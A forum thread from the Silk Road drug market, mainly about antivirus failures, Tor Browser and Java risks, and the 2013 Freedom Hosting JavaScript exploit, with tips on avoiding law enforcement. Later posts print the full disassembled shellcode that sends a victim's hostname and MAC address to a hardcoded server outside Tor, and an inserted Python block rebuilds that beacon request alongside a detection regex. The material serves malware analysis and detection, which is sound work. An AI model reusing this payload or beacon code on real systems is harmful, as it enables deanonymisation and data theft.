Silk Road forums

Discussion => Security => Topic started by: astor on June 19, 2013, 02:16 am

Title: A warning about antivirus programs
Post by: astor on June 19, 2013, 02:16 am
They're crap. They don't work. If you use Windows, you should make a rescue disk now, because if you get infected with malware, the only way to be sure you get rid of it is to format the hard drive and do a clean reinstall of the OS.


Remember when a bunch of people got messages on SR saying that someone had recorded them getting drugs out of their mailbox, and they could view the video on some site? The site had a Java app that turned out to be malware.

At the time, someone in our community clicked the Java app and got infected. He asked me what to do. I told him to format the hard drive and do a clean reinstall. He didn't listen to me, and instead spent 3 days removing the malware.

Or so he thought.

Today this person told me that he got the password reset for his SR account. I didn't know he had to reset his password, but he should have been suspicious from that alone, although he never mentioned it to me. When he logged in, all his BTC had been withdrawn. It was not a trivial amount of BTC.  While talking to him, he rescanned his computer and found more malware. I experienced this myself when I infected a WinXP VM on purpose with the Trojan downloader on that site, "cleaned" it with an antivirus program, rebooted it and found the same rootkits.

Since the malware came from someone targeting SR users, he got infected with it, and his account was later compromised, it is very likely this is the thing that stole his login credentials. He adamantly denies it could have been a phishing site or other things, but in my experience, when people are 100% sure about something, that it absolutely could not have been something, most of the time they are wrong.

Anyway, all this could have been avoided if he had done a clean reinstall.
Title: Re: A warning about antivirus programs
Post by: astor on June 19, 2013, 02:26 am
Let me be more clear. You should make an actual disk, on read-only media, because a rescue partition can be infected too.
Title: Re: A warning about antivirus programs
Post by: SelfSovereignty on June 19, 2013, 02:34 am
Er... well actually, that depends on your BIOS these days I believe.  RootKits are nasty, don't get me wrong, but if you've got a newer BIOS that supports UEFI and SecureBoot... this scenario shouldn't be possible.

If you don't have a Windows 8 computer, you most likely do not have UEFI and/or SecureBoot.  Note that I've never tested that SecureBoot really does work, but it *is* what they made it for (ostensibly), so I should hope it does...

Oh, yeah... as for Java: don't just disable it.  If you don't actively use it, just outright uninstall the entire JRE or JDK (runtime environment / developer's kit).  BTW: how the Hell did a Java app execute from the Tor browser, anyway?
Title: Re: A warning about antivirus programs
Post by: astor on June 19, 2013, 02:47 am
Er... well actually, that depends on your BIOS these days I believe.  RootKits are nasty, don't get me wrong, but if you've got a newer BIOS that supports UEFI and SecureBoot... this scenario shouldn't be possible.

Yeah, that's true. Good point. Secure Boot should help.

Unfortunately, it's a pain for other reasons, like installing alternative operating systems. It also may not be turned on by default. I believe Microsoft only mandated it on devices with ARM processors (ie, running Windows RT). In other cases, the computer vendor is free to choose.

Quote
Oh, yeah... as for Java: don't just disable it.  If you don't actively use it, just outright uninstall the entire JRE or JDK (runtime environment / developer's kit).  BTW: how the Hell did a Java app execute from the Tor browser, anyway?

Not sure. TorBrowser is supposed to be isolated to the folder it is extracted to, so it shouldn't know that Java is installed. That may only be the case for the Linux version.
Title: Re: A warning about antivirus programs
Post by: Jack N Hoff on June 19, 2013, 02:51 am
Oh, I was in the chat with that guy.  I didn't realize that he was one of the people that went to that URL.

Sucks :(
Title: Re: A warning about antivirus programs
Post by: royalblue on June 19, 2013, 02:52 am
Like SS said, no Java in TorBrowser and JS can't deliver malware without the user clicking Run in a dialog.  Lesson: People need to be mindful of what they are clicking.

Everyone should set their NoScript to NOT Allow Scripts Globally (this is the TBB default so if you haven't manually changed it you need to). Then enable it on trustworthy sites like the forums.  SR itself does not require JS to function.

And since we are talking about potentially custom-created spyware/malware that targets SR users, reformatting/reinstalling is probably good advice.
Title: Re: A warning about antivirus programs
Post by: royalblue on June 19, 2013, 03:18 am
Oh, yeah... as for Java: don't just disable it.  If you don't actively use it, just outright uninstall the entire JRE or JDK (runtime environment / developer's kit).  BTW: how the Hell did a Java app execute from the Tor browser, anyway?

Not sure. TorBrowser is supposed to be isolated to the folder it is extracted to, so it shouldn't know that Java is installed. That may only be the case for the Linux version.

To be exact, TBB should not be able to interact with the JVM/JRE without the Firefox/TBB Java plugin.  This plugin should not be installed, nor should any.

For those that don't know, type this in your address bar:
Code: [Select]
about:plugins
There shouldn't be any plugins installed.
Title: Re: A warning about antivirus programs
Post by: astor on June 19, 2013, 03:21 am
Oh right, I overlooked the obvious. Like a lot of people unfortunately, he probably copied the clearnet link to a regular browser.
Title: Re: A warning about antivirus programs
Post by: fartsinthewind on June 19, 2013, 05:40 am
Most of this stuff is over my head, but I have a pretty good grasp of Tor and PGP. I have recently been thinking about purchasing a cheap used laptop and just using it for USB-based VM platform Tor browsing at public wifi spots. The problem is, no matter how secure you are technologically, the weakest link is the physical exchange of goods. You have to receive somewhere, on some regularity. Pattern recognition is how LE targets suspects, and unfortunately that's unavoidable.

Thoughts?
Title: Re: A warning about antivirus programs
Post by: astor on June 19, 2013, 05:46 am
fartsinthewind, yeah receiving drugs is the riskiest part. Check out the SR Risk Analysis for Buyers thread, that's exactly what we're talking about there.
Title: Re: A warning about antivirus programs
Post by: kmfkewm on June 19, 2013, 09:43 am
They're crap. They don't work. If you use Windows, you should make a rescue disk now, because if you get infected with malware, the only way to be sure you get rid of it is to format the hard drive and do a clean reinstall of the OS.

In the vast majority of cases you are correct, but technically even wiping the drive and doing a clean install of the OS is not enough to ensure you have removed all malware. In many cases it is possible for malware to infect your video card, your mouse, your keyboard and anything else that has reflashable or persistent memory on it. Some mice these days have their own CPUs and on-board memory! In such a case it is possible to have a totally cleaned drive and freshly installed OS, and to get reinfected via your infected peripherals and other hardware.
 
Quote
JS can't deliver malware without the user clicking Run in a dialog

Javascript can be used to deliver malware via browser exploits.

Title: Re: A warning about antivirus programs
Post by: SelfSovereignty on June 19, 2013, 11:55 am
They're crap. They don't work. If you use Windows, you should make a rescue disk now, because if you get infected with malware, the only way to be sure you get rid of it is to format the hard drive and do a clean reinstall of the OS.

In the vast majority of cases you are correct, but technically even wiping the drive and doing a clean install of the OS is not enough to ensure you have removed all malware. In many cases it is possible for malware to infect your video card, your mouse, your keyboard and anything else that has reflashable or persistent memory on it. Some mice these days have their own CPUs and on-board memory! In such a case it is possible to have a totally cleaned drive and freshly installed OS, and to get reinfected via your infected peripherals and other hardware.

I'm not claiming that this isn't possible, but honestly if you aren't dealing with international espionage, nuclear secrets, and/or governments that buy up zero days like there's no tomorrow... I really, really don't think you have to worry about this.  We have a lot of paranoid people about -- I personally don't feel that the vast majority of users should even consider this possibility (as in for most it's a level of paranoia that will hinder your safety, not help it)... but again, I'm not claiming this isn't possible and I don't really know how many people have instructions to build WMDs sitting around as icons on their desktop, so who knows... :)

Quote
Quote
JS can't deliver malware without the user clicking Run in a dialog

Javascript can be used to deliver malware via browser exploits.

Anything that actually modifies the state of the machine has the potential to be used as an exploit.  You don't always have to execute code or evaluate a script to get machine code loaded into main memory; just reading data from a site can be enough (i.e. buffer overrun kind of thing).  It's not likely, of course, but it's possible.  Whether you should worry about it or not depends on how badly you think they wanna catch you.

Do you make DPR look like Mother Teresa?  Then yeah, I'd start worrying about it.

Not the kingpin of several international child slavery organizations?  Eh, have a cup o' tea and relax a spell... :)
Title: Re: A warning about antivirus programs
Post by: royalblue on June 19, 2013, 03:22 pm
Quote
JS can't deliver malware without the user clicking Run in a dialog

Javascript can be used to deliver malware via browser exploits.
True, doesn't seem to be the case here though.
Title: Re: A warning about antivirus programs
Post by: MrBlack999 on August 11, 2013, 05:10 am
How in the hell do you make a rescue disk, and wouldn't the recovery disk/drive be infected with the trojan/rootkit?


Mr.Black
Title: Re: A warning about antivirus programs
Post by: spectrum on August 11, 2013, 05:19 am
It could be if you make the rescue disk after you are infected, but that's why you should make one right when you buy a new computer.
Title: Re: A warning about antivirus programs
Post by: MrBlack999 on August 11, 2013, 05:31 am
I fucking hate my life now....


Mr.Black
Title: Re: A warning about antivirus programs
Post by: kmfkewm on August 11, 2013, 05:46 am
Quote
Quote
Quote
JS can't deliver malware without the user clicking Run in a dialog

Javascript can be used to deliver malware via browser exploits.

Anything that actually modifies the state of the machine has the potential to be used as an exploit.  You don't always have to execute code or evaluate a script to get machine code loaded into main memory; just reading data from a site can be enough (i.e. buffer overrun kind of thing).  It's not likely, of course, but it's possible.  Whether you should worry about it or not depends on how badly you think they wanna catch you.

Do you make DPR look like Mother Teresa?  Then yeah, I'd start worrying about it.

Not the kingpin of several international child slavery organizations?  Eh, have a cup o' tea and relax a spell... :)

Apparently just visiting sites on the same server as CP is enough.
Title: Re: A warning about antivirus programs
Post by: kmfkewm on August 11, 2013, 05:47 am
Quote
JS can't deliver malware without the user clicking Run in a dialog

Javascript can be used to deliver malware via browser exploits.
True, doesn't seem to be the case here though.

Doesn't seem to be the case where? It just happened to anybody who visited any site hosted by freedom hosting.
Title: Re: A warning about antivirus programs
Post by: astor on August 11, 2013, 05:52 am
Quote
JS can't deliver malware without the user clicking Run in a dialog

Javascript can be used to deliver malware via browser exploits.

And once again how prescient that was.

In retrospect, this was the first remote execution vulnerability to be used against Tor users, it just wasn't as obvious because the people who got pwned copied the link into a regular browser.

Ironically, I used a disposable Win XP VM to look at and identify the malware in this case without getting pwned.
Title: Re: A warning about antivirus programs
Post by: kmfkewm on August 11, 2013, 05:57 am
Quote
JS can't deliver malware without the user clicking Run in a dialog

Javascript can be used to deliver malware via browser exploits.

And once again how prescient that was.

In retrospect, this was the first remote execution vulnerability to be used against Tor users, it just wasn't as obvious because the people who got pwned copied the link into a regular browser.

Ironically, I used a disposable Win XP VM to look at and identify the malware in this case without getting pwned.

I have a contact who has been analyzing the malware, he tested it multiple times with Win XP and it was hit or miss in regards to if it worked or not. From an article I read from other hackers who analyzed it, some of it was specific to Windows 7, so on other versions of Windows it had a lower probability of actually working whereas on Windows 7 it had a high probability of working.

You really had to have the perfect storm of fuck ups to be compromised by this. Old version of Tor Browser, javascript enabled, on Windows and especially Windows 7, without isolation of the browser, without a VPN (although VPN would only help you somewhat), without firewall rules.
Title: Re: A warning about antivirus programs
Post by: jampants on August 11, 2013, 06:23 am
I'm sorry but you guys are 5-10 years behind where the bleeding edge of malware is at the moment. And I'm not just talking about another fucking Slavik ZeuS bot/trojan or some dumb Chinese APT threat. Go study the FLAME malware and you will understand how much of a beautiful piece of work it was, MD5 collision attack using new cryptographic attacks to break Windows Update.

A Java 0-day is simple compared to some of the attacks out there but unless you piss off a few certain people or a 3 letter agency you don't have much to worry about. What you do have to worry about is fucktards like VUPEN selling exploit kits to LEA to target certain users, as I'm sure the FH job was done using an exploit kit made by a contractor.
Title: Re: A warning about antivirus programs
Post by: kmfkewm on August 11, 2013, 06:30 am
I'm sorry but you guys are 5-10 years behind where the bleeding edge of malware is at the moment. And I'm not just talking about another fucking Slavik ZeuS bot/trojan or some dumb Chinese APT threat. Go study the FLAME malware and you will understand how much of a beautiful piece of work it was, MD5 collision attack using new cryptographic attacks to break Windows Update.

A Java 0-day is simple compared to some of the attacks out there but unless you piss off a few certain people or a 3 letter agency you don't have much to worry about. What you do have to worry about is fucktards like VUPEN selling exploit kits to LEA to target certain users, as I'm sure the FH job was done using an exploit kit made by a contractor.

We are 5-10 years behind or the feds are? If the NSA did this attack (and gave it their all) it would have found a way to fingerprint the OS people were using and target a specific payload to them, that then fingerprinted its environment to see if there was isolation or other security techniques, and then obtained other payloads to break through the isolation and disable each layer of security one at a time, prior to sending the information back to them. And it would have all been zero days, obfuscated and encrypted and probably never would have been detected in the first place.

The FBI used a month-old javascript exploit to deliver a payload that was targeted specifically to Windows 7 and to a lesser extent Windows in general, and it didn't even attempt to break out of isolation or disable any security features. The NSA has fucking cyber missiles essentially, they will blow their way through ten layers of isolation in the blink of an eye. The FBI has always used already patched exploits, I have never read of a case where they did an attack like this with an actual 0-day, let alone tried to break out of layers of security.

Quote
Chinese APT threat

A Chinese advanced persistent threat threat ;)?
Title: Re: A warning about antivirus programs
Post by: jampants on August 11, 2013, 07:00 am


A Chinese advanced persistent threat threat ;)?

yes yes yum cha malware
Title: Re: A warning about antivirus programs
Post by: royalblue on August 11, 2013, 02:54 pm
Quote
JS can't deliver malware without the user clicking Run in a dialog

Javascript can be used to deliver malware via browser exploits.
True, doesn't seem to be the case here though.

Doesn't seem to be the case where? It just happened to anybody who visited any site hosted by freedom hosting.

The OP discusses malware downloaded via JAVA app exploit. A JS exploit did not seem to be the case based on the information provided in the OP.  I stand by that statement.

Freedom Hosting is a different story, obviously it was a JS exploit but I've seen no evidence that there was malware delivered by javascript as you are contending.  It was an exploit made possible by javascript.  Where's the malware???
Title: Re: A warning about antivirus programs
Post by: kmfkewm on August 11, 2013, 03:31 pm
Quote
JS can't deliver malware without the user clicking Run in a dialog

Javascript can be used to deliver malware via browser exploits.
True, doesn't seem to be the case here though.

Doesn't seem to be the case where? It just happened to anybody who visited any site hosted by freedom hosting.

The OP discusses malware downloaded via JAVA app exploit. A JS exploit did not seem to be the case based on the information provided in the OP.  I stand by that statement.

Freedom Hosting is a different story, obviously it was a JS exploit but I've seen no evidence that there was malware delivered by javascript as you are contending.  It was an exploit made possible by javascript.  Where's the malware???

The malware is what gathered users' hostname and MAC and sent it back to their server outside of Tor. It was delivered via a javascript exploit. They could have delivered any payload they wanted.
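What that "hostname and MAC, sent outside of Tor" beacon looks like on the wire, reconstructed from the data embedded in the disassembly kmfkewm posts next in this thread. This is an added example, not code from the thread or from the payload itself: the request line and Host header come from the string at ebp+0x2e9, the "\r\nCookie: ID=" fragment from ebp+0x2c4, the trailer from ebp+0x275, the destination from the sockaddr_in at ebp+0x2e1, the 32-byte hostname cap from the cmp edx,0x20 check, and the upper-case hex from the +0x30/+0x37 nibble loop. The hostname, MAC and sample requests are constructed for the example.

```python
import re

# Where the shellcode connects: sockaddr_in {AF_INET, htons(80), 65.222.202.54},
# reached over plain TCP from the browser process, i.e. not through Tor.
C2_ADDR = ("65.222.202.54", 80)

# Request prefix at ebp+0x2e9; the NUL right after "Host: " is where the
# gethostname() result is copied in.
REQUEST_PREFIX = b"GET /05cea4de-951d-4037-bf8f-f69055b279bb HTTP/1.1\r\nHost: "
# 13-byte fragment at ebp+0x2c4 (mov ecx,0xd / rep movsb).
COOKIE_PREFIX = b"\r\nCookie: ID="
# Trailer at ebp+0x275, appended by the routine at 0x257 once the MAC is in place.
TRAILER = (b"\r\nConnection: keep-alive\r\nAccept: */*\r\n"
           b"Accept-Encoding: gzip\r\n\r\n")
# cmp edx,0x20 / jl / mov edx,0x20: at most 32 bytes of hostname are copied.
HOSTNAME_MAX = 0x20


def hex_upper(data: bytes) -> bytes:
    """The shellcode's nibble loop: 0-9 -> '0'-'9' (+0x30), A-F -> 'A'-'F' (+0x37)."""
    out = bytearray()
    for b in data:
        for nibble in (b >> 4, b & 0xF):
            out.append(nibble + (0x30 if nibble <= 9 else 0x37))
    return bytes(out)


def build_beacon(hostname: bytes, mac: bytes) -> bytes:
    """Assemble the request the payload sends for a given hostname and MAC."""
    if len(mac) != 6:
        raise ValueError("SendARP yields a 6-byte MAC; got %d bytes" % len(mac))
    return (REQUEST_PREFIX + hostname[:HOSTNAME_MAX]
            + COOKIE_PREFIX + hex_upper(mac) + TRAILER)


# Detection side: the fixed UUID path plus a Cookie whose value is exactly
# 12 upper-case hex digits is specific enough to match in proxy or IDS logs.
BEACON_RE = re.compile(
    rb"\AGET /05cea4de-951d-4037-bf8f-f69055b279bb HTTP/1\.1\r\n"
    rb"Host: (?P<host>[^\r\n]{0,32})\r\n"
    rb"Cookie: ID=(?P<mac>[0-9A-F]{12})\r\n"
)


def parse_beacon(request: bytes):
    """Return the leaked hostname and MAC if `request` is this beacon, else None."""
    m = BEACON_RE.match(request)
    if m is None:
        return None
    mac = m.group("mac").decode("ascii")
    return {
        "hostname": m.group("host").decode("ascii", errors="replace"),
        "mac": ":".join(mac[i:i + 2] for i in range(0, 12, 2)),
    }


if __name__ == "__main__":
    # Constructed sample: a Windows 7 box with a made-up MAC.
    sample = build_beacon(b"WIN7-PC", bytes.fromhex("001122aabbcc"))
    print(sample.decode("ascii"))
    print(parse_beacon(sample))
    print(parse_beacon(b"GET / HTTP/1.1\r\nHost: example.org\r\n\r\n"))
```

Two things stand out for anyone writing a rule from this: the Host header carries the victim's machine name rather than any DNS name of the destination, and the whole thing goes to a bare IP on port 80, so an egress rule that only lets the Tor process talk to the network would have stopped the beacon even with the exploit succeeding.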
Title: Re: A warning about antivirus programs
Post by: kmfkewm on August 11, 2013, 03:44 pm
More specifically, here is the malware:

Quote
00000000  60                pusha
00000001  FC                cld
00000002  E88A000000        call 0x91
00000007  60                pusha # win32 function resolver by @stephenfewer, used by Metasploit
00000008  89E5              mov ebp,esp
0000000A  31D2              xor edx,edx
0000000C  648B5230          mov edx,[fs:edx+0x30]
00000010  8B520C            mov edx,[edx+0xc]
00000013  8B5214            mov edx,[edx+0x14]
00000016  8B7228            mov esi,[edx+0x28]
00000019  0FB74A26          movzx ecx,word [edx+0x26]
0000001D  31FF              xor edi,edi
0000001F  31C0              xor eax,eax
00000021  AC                lodsb
00000022  3C61              cmp al,0x61
00000024  7C02              jl 0x28
00000026  2C20              sub al,0x20
00000028  C1CF0D            ror edi,0xd
0000002B  01C7              add edi,eax
0000002D  E2F0              loop 0x1f
0000002F  52                push edx
00000030  57                push edi
00000031  8B5210            mov edx,[edx+0x10]
00000034  8B423C            mov eax,[edx+0x3c]
00000037  01D0              add eax,edx
00000039  8B4078            mov eax,[eax+0x78]
0000003C  85C0              test eax,eax
0000003E  744A              jz 0x8a
00000040  01D0              add eax,edx
00000042  50                push eax
00000043  8B4818            mov ecx,[eax+0x18]
00000046  8B5820            mov ebx,[eax+0x20]
00000049  01D3              add ebx,edx
0000004B  E33C              jecxz 0x89
0000004D  49                dec ecx
0000004E  8B348B            mov esi,[ebx+ecx*4]
00000051  01D6              add esi,edx
00000053  31FF              xor edi,edi
00000055  31C0              xor eax,eax
00000057  AC                lodsb
00000058  C1CF0D            ror edi,0xd
0000005B  01C7              add edi,eax
0000005D  38E0              cmp al,ah
0000005F  75F4              jnz 0x55
00000061  037DF8            add edi,[ebp-0x8]
00000064  3B7D24            cmp edi,[ebp+0x24]
00000067  75E2              jnz 0x4b
00000069  58                pop eax
0000006A  8B5824            mov ebx,[eax+0x24]
0000006D  01D3              add ebx,edx
0000006F  668B0C4B          mov cx,[ebx+ecx*2]
00000073  8B581C            mov ebx,[eax+0x1c]
00000076  01D3              add ebx,edx
00000078  8B048B            mov eax,[ebx+ecx*4]
0000007B  01D0              add eax,edx
0000007D  89442424          mov [esp+0x24],eax
00000081  5B                pop ebx
00000082  5B                pop ebx
00000083  61                popa
00000084  59                pop ecx
00000085  5A                pop edx
00000086  51                push ecx
00000087  FFE0              jmp eax
00000089  58                pop eax
0000008A  5F                pop edi
0000008B  5A                pop edx
0000008C  8B12              mov edx,[edx]
0000008E  EB86              jmp short 0x16
00000090  skipping 0x1 bytes
00000091  5D                pop ebp
00000092  81BDE90200004745  cmp dword [ebp+0x2e9],0x20544547 # "GET "
         -5420
0000009C  7570              jnz 0x10e
0000009E  8D85D1020000      lea eax,[ebp+0x2d1] "ws2_32"
000000A4  50                push eax
000000A5  684C772607        push dword 0x726774c # LoadLibraryA
000000AA  FFD5              call ebp
000000AC  85C0              test eax,eax
000000AE  745E              jz 0x10e
000000B0  8D85D8020000      lea eax,[ebp+0x2d8] "IPHLPAPI"
000000B6  50                push eax
000000B7  684C772607        push dword 0x726774c # LoadLibraryA
000000BC  FFD5              call ebp # ebp = find function
000000BE  85C0              test eax,eax
000000C0  744C              jz 0x10e
000000C2  BB90010000        mov ebx,0x190
000000C7  29DC              sub esp,ebx
000000C9  54                push esp
000000CA  53                push ebx
000000CB  6829806B00        push dword 0x6b8029 # WSAStartupA
000000D0  FFD5              call ebp
000000D2  01DC              add esp,ebx
000000D4  85C0              test eax,eax
000000D6  7536              jnz 0x10e
000000D8  50                push eax
000000D9  50                push eax
000000DA  50                push eax
000000DB  50                push eax
000000DC  40                inc eax
000000DD  50                push eax
000000DE  40                inc eax
000000DF  50                push eax
000000E0  68EA0FDFE0        push dword 0xe0df0fea # WSASocketA
000000E5  FFD5              call ebp
000000E7  31DB              xor ebx,ebx
000000E9  F7D3              not ebx
000000EB  39C3              cmp ebx,eax
000000ED  741F              jz 0x10e
000000EF  89C3              mov ebx,eax
000000F1  6A10              push byte +0x10
000000F3  8DB5E1020000      lea esi,[ebp+0x2e1] # struct sockaddr_in { AF_INET, 80, 65.222.202.54 }
000000F9  56                push esi
000000FA  53                push ebx
000000FB  6899A57461        push dword 0x6174a599 # connect
00000100  FFD5              call ebp
00000102  85C0              test eax,eax
00000104  741F              jz 0x125
00000106  FE8D89000000      dec byte [ebp+0x89] # Try to connect 5 times
0000010C  75E3              jnz 0xf1
0000010E  80BD4F02000001    cmp byte [ebp+0x24f],0x1
00000115  7407              jz 0x11e
00000117  E83B010000        call 0x257
0000011C  EB05              jmp short 0x123
0000011E  E84D010000        call 0x270
00000123  FFE7              jmp edi
00000125  B800010000        mov eax,0x100
0000012A  29C4              sub esp,eax
0000012C  89E2              mov edx,esp
0000012E  52                push edx
0000012F  50                push eax
00000130  52                push edx
00000131  68B649DE01        push dword 0x1de49b6 # gethostname
00000136  FFD5              call ebp
00000138  5F                pop edi
00000139  81C400010000      add esp,0x100
0000013F  85C0              test eax,eax
00000141  0F85F2000000      jnz near 0x239
00000147  57                push edi
00000148  E8F9000000        call 0x246 # strlen of gethostname
0000014D  5E                pop esi
0000014E  89CA              mov edx,ecx
00000150  8DBDE9020000      lea edi,[ebp+0x2e9]
00000156  E8EB000000        call 0x246 # strlen (to move EDI to the NULL byte at the end of the HTTP string)
0000015B  4F                dec edi
0000015C  83FA20            cmp edx,byte +0x20
0000015F  7C05              jl 0x166
00000161  BA20000000        mov edx,0x20
00000166  89D1              mov ecx,edx
00000168  56                push esi
00000169  F3A4              rep movsb
0000016B  B90D000000        mov ecx,0xd
00000170  8DB5C4020000      lea esi,[ebp+0x2c4] "\r\nCookie: ID="
00000176  F3A4              rep movsb
00000178  89BD4B020000      mov [ebp+0x24b],edi
0000017E  5E                pop esi
0000017F  56                push esi
00000180  68A9283480        push dword 0x803428a9 # gethostbyname
00000185  FFD5              call ebp
00000187  85C0              test eax,eax
00000189  0F84AA000000      jz near 0x239
0000018F  668B480A          mov cx,[eax+0xa]
00000193  6683F904          cmp cx,byte +0x4
00000197  0F829C000000      jc near 0x239
0000019D  8D400C            lea eax,[eax+0xc]
000001A0  8B00              mov eax,[eax]
000001A2  8B08              mov ecx,[eax]
000001A4  8B09              mov ecx,[ecx]
000001A6  B800010000        mov eax,0x100
000001AB  50                push eax
000001AC  89E7              mov edi,esp
000001AE  29C4              sub esp,eax
000001B0  89E6              mov esi,esp
000001B2  57                push edi
000001B3  56                push esi
000001B4  51                push ecx
000001B5  51                push ecx
000001B6  684872D2B8        push dword 0xb8d27248 # iphlpapi.dll!SendARP
000001BB  FFD5              call ebp
000001BD  85C0              test eax,eax
000001BF  81C404010000      add esp,0x104
000001C5  0FB70F            movzx ecx,word [edi]
000001C8  83F906            cmp ecx,byte +0x6
000001CB  726C              jc 0x239
000001CD  B906000000        mov ecx,0x6
000001D2  B810000000        mov eax,0x10
000001D7  29C4              sub esp,eax
000001D9  89E7              mov edi,esp
000001DB  89CA              mov edx,ecx
000001DD  D1E2              shl edx,1
000001DF  50                push eax
000001E0  52                push edx
000001E1  31D2              xor edx,edx
000001E3  8A16              mov dl,[esi]
000001E5  88D0              mov al,dl
000001E7  24F0              and al,0xf0 # It actually turns the raw data into hex strings before appending it to the HTTP header
000001E9  C0E804            shr al,0x4
000001EC  3C09              cmp al,0x9
000001EE  7704              ja 0x1f4
000001F0  0430              add al,0x30
000001F2  EB02              jmp short 0x1f6
000001F4  0437              add al,0x37
000001F6  8807              mov [edi],al
000001F8  47                inc edi
000001F9  88D0              mov al,dl
000001FB  240F              and al,0xf
000001FD  3C09              cmp al,0x9
000001FF  7704              ja 0x205
00000201  0430              add al,0x30
00000203  EB02              jmp short 0x207
00000205  0437              add al,0x37
00000207  8807              mov [edi],al
00000209  47                inc edi
0000020A  46                inc esi
0000020B  E2D4              loop 0x1e1
0000020D  59                pop ecx
0000020E  29CF              sub edi,ecx
00000210  89FE              mov esi,edi
00000212  58                pop eax
00000213  01C4              add esp,eax
00000215  8BBD4B020000      mov edi,[ebp+0x24b]
0000021B  F3A4              rep movsb
0000021D  C6854F02000001    mov byte [ebp+0x24f],0x1
00000224  E82E000000        call 0x257 # Append "Connection: keep-alive\r\nAccept: */*\r\nAccept-Encoding: gzip\r\n\r\n" and return the new strlen(ebp + 0x2e9)
00000229  31C0              xor eax,eax
0000022B  50                push eax
0000022C  51                push ecx
0000022D  29CF              sub edi,ecx
0000022F  4F                dec edi
00000230  57                push edi
00000231  53                push ebx
00000232  68C2EB385F        push dword 0x5f38ebc2 # send
00000237  FFD5              call ebp
00000239  53                push ebx
0000023A  68756E4D61        push dword 0x614d6e75 # closesocket
0000023F  FFD5              call ebp
00000241  E9C8FEFFFF        jmp 0x10e
00000246  31C9              xor ecx,ecx
00000248  F7D1              not ecx
0000024A  31C0              xor eax,eax
0000024C  F2AE              repne scasb
0000024E  F7D1              not ecx
00000250  49                dec ecx
00000251  C3                ret
00000252  0000              add [eax],al
00000254  0000              add [eax],al
00000256  skipping 0x1 bytes
00000257  8DBDE9020000      lea edi,[ebp+0x2e9]
0000025D  E8E4FFFFFF        call 0x246
00000262  4F                dec edi
00000263  B94F000000        mov ecx,0x4f
00000268  8DB575020000      lea esi,[ebp+0x275]
0000026E  F3A4              rep movsb
00000270  8DBDE9020000      lea edi,[ebp+0x2e9]
00000276  E8CBFFFFFF        call 0x246
0000027B  C3                ret
0000027C  0D0A436F6E        or eax,0x6e6f430a
00000281  6E                outsb
00000282  656374696F        arpl [gs:ecx+ebp*2+0x6f],si
00000287  6E                outsb
00000288  3A20              cmp ah,[eax]
0000028A  6B656570          imul esp,[ebp+0x65],byte +0x70
0000028E  2D616C6976        sub eax,0x76696c61
00000293  650D0A416363      gs or eax,0x6363410a
00000299  657074            gs jo 0x310
0000029C  3A20              cmp ah,[eax]
0000029E  2A2F              sub ch,[edi]
000002A0  2A0D0A416363      sub cl,[0x6363410a]
000002A6  657074            gs jo 0x31d
000002A9  2D456E636F        sub eax,0x6f636e45
000002AE  64696E673A20677A  imul ebp,[fs:esi+0x67],dword 0x7a67203a
000002B6  69700D0A0D0A00    imul esi,[eax+0xd],dword 0xa0d0a
000002BD  83C70E            add edi,byte +0xe
000002C0  31C9              xor ecx,ecx
000002C2  F7D1              not ecx
000002C4  31C0              xor eax,eax
000002C6  F3AE              repe scasb
000002C8  4F                dec edi
000002C9  FFE7              jmp edi
000002CB  0D0A436F6F        or eax,0x6f6f430a
000002D0  6B69653A          imul ebp,[ecx+0x65],byte +0x3a
000002D4  204944            and [ecx+0x44],cl
000002D7  3D7773325F        cmp eax,0x5f327377
000002DC  3332              xor esi,[edx]
000002DE  004950            add [ecx+0x50],cl
000002E1  48                dec eax
000002E2  4C                dec esp
000002E3  50                push eax
000002E4  41                inc ecx
000002E5  50                push eax
000002E6  49                dec ecx
000002E7  0002              add [edx],al
000002E9  0000              add [eax],al
000002EB  50                push eax
000002EC  41                inc ecx
000002ED  DECA              fmulp st2
000002EF  3647              ss inc edi
000002F1  45                inc ebp
000002F2  54                push esp
000002F3  202F              and [edi],ch
000002F5  303563656134      xor [0x34616563],dh
000002FB  64652D39353164    gs sub eax,0x64313539
00000302  2D34303337        sub eax,0x37333034
00000307  2D62663866        sub eax,0x66386662
0000030C  2D66363930        sub eax,0x30393666
00000311  3535623237        xor eax,0x37326235
00000316  396262            cmp [edx+0x62],esp
00000319  204854            and [eax+0x54],cl
0000031C  54                push esp
0000031D  50                push eax
0000031E  2F                das
0000031F  312E              xor [esi],ebp
00000321  310D0A486F73      xor [0x736f480a],ecx
00000327  743A              jz 0x363
00000329  2000              and [eax],al
0000032B  0000              add [eax],al
0000032D  0000              add [eax],al
0000032F  0000              add [eax],al
00000331  0000              add [eax],al
00000333  0000              add [eax],al
00000335  0000              add [eax],al
00000337  0000              add [eax],al
00000339  0000              add [eax],al
0000033B  0000              add [eax],al
0000033D  0000              add [eax],al
0000033F  0000              add [eax],al
00000341  0000              add [eax],al
00000343  0000              add [eax],al
00000345  0000              add [eax],al
00000347  0000              add [eax],al
00000349  0000              add [eax],al
0000034B  0000              add [eax],al
0000034D  0000              add [eax],al
0000034F  0000              add [eax],al
00000351  0000              add [eax],al
00000353  0000              add [eax],al
00000355  0000              add [eax],al
00000357  0000              add [eax],al
00000359  0000              add [eax],al
0000035B  0000              add [eax],al
0000035D  0000              add [eax],al
0000035F  0000              add [eax],al
00000361  0000              add [eax],al
00000363  0000              add [eax],al
00000365  0000              add [eax],al
00000367  0000              add [eax],al
00000369  0000              add [eax],al
0000036B  0000              add [eax],al
0000036D  0000              add [eax],al
0000036F  0000              add [eax],al
00000371  0000              add [eax],al
00000373  0000              add [eax],al
00000375  0000              add [eax],al
00000377  0000              add [eax],al
00000379  0000              add [eax],al
0000037B  0000              add [eax],al
0000037D  0000              add [eax],al
0000037F  0000              add [eax],al
00000381  0000              add [eax],al
00000383  0000              add [eax],al
00000385  0000              add [eax],al
00000387  0000              add [eax],al
00000389  0000              add [eax],al
0000038B  0000              add [eax],al
0000038D  0000              add [eax],al
0000038F  0000              add [eax],al
00000391  0000              add [eax],al
00000393  0000              add [eax],al
00000395  0000              add [eax],al
00000397  0000              add [eax],al
00000399  0000              add [eax],al
0000039B  0000              add [eax],al
0000039D  0000              add [eax],al
0000039F  0000              add [eax],al
000003A1  0000              add [eax],al
000003A3  0000              add [eax],al
000003A5  0000              add [eax],al
000003A7  0000              add [eax],al
000003A9  0000              add [eax],al
000003AB  0000              add [eax],al
000003AD  0000              add [eax],al
000003AF  0000              add [eax],al
000003B1  0000              add [eax],al
000003B3  0000              add [eax],al
000003B5  0000              add [eax],al
000003B7  0000              add [eax],al
000003B9  0000              add [eax],al
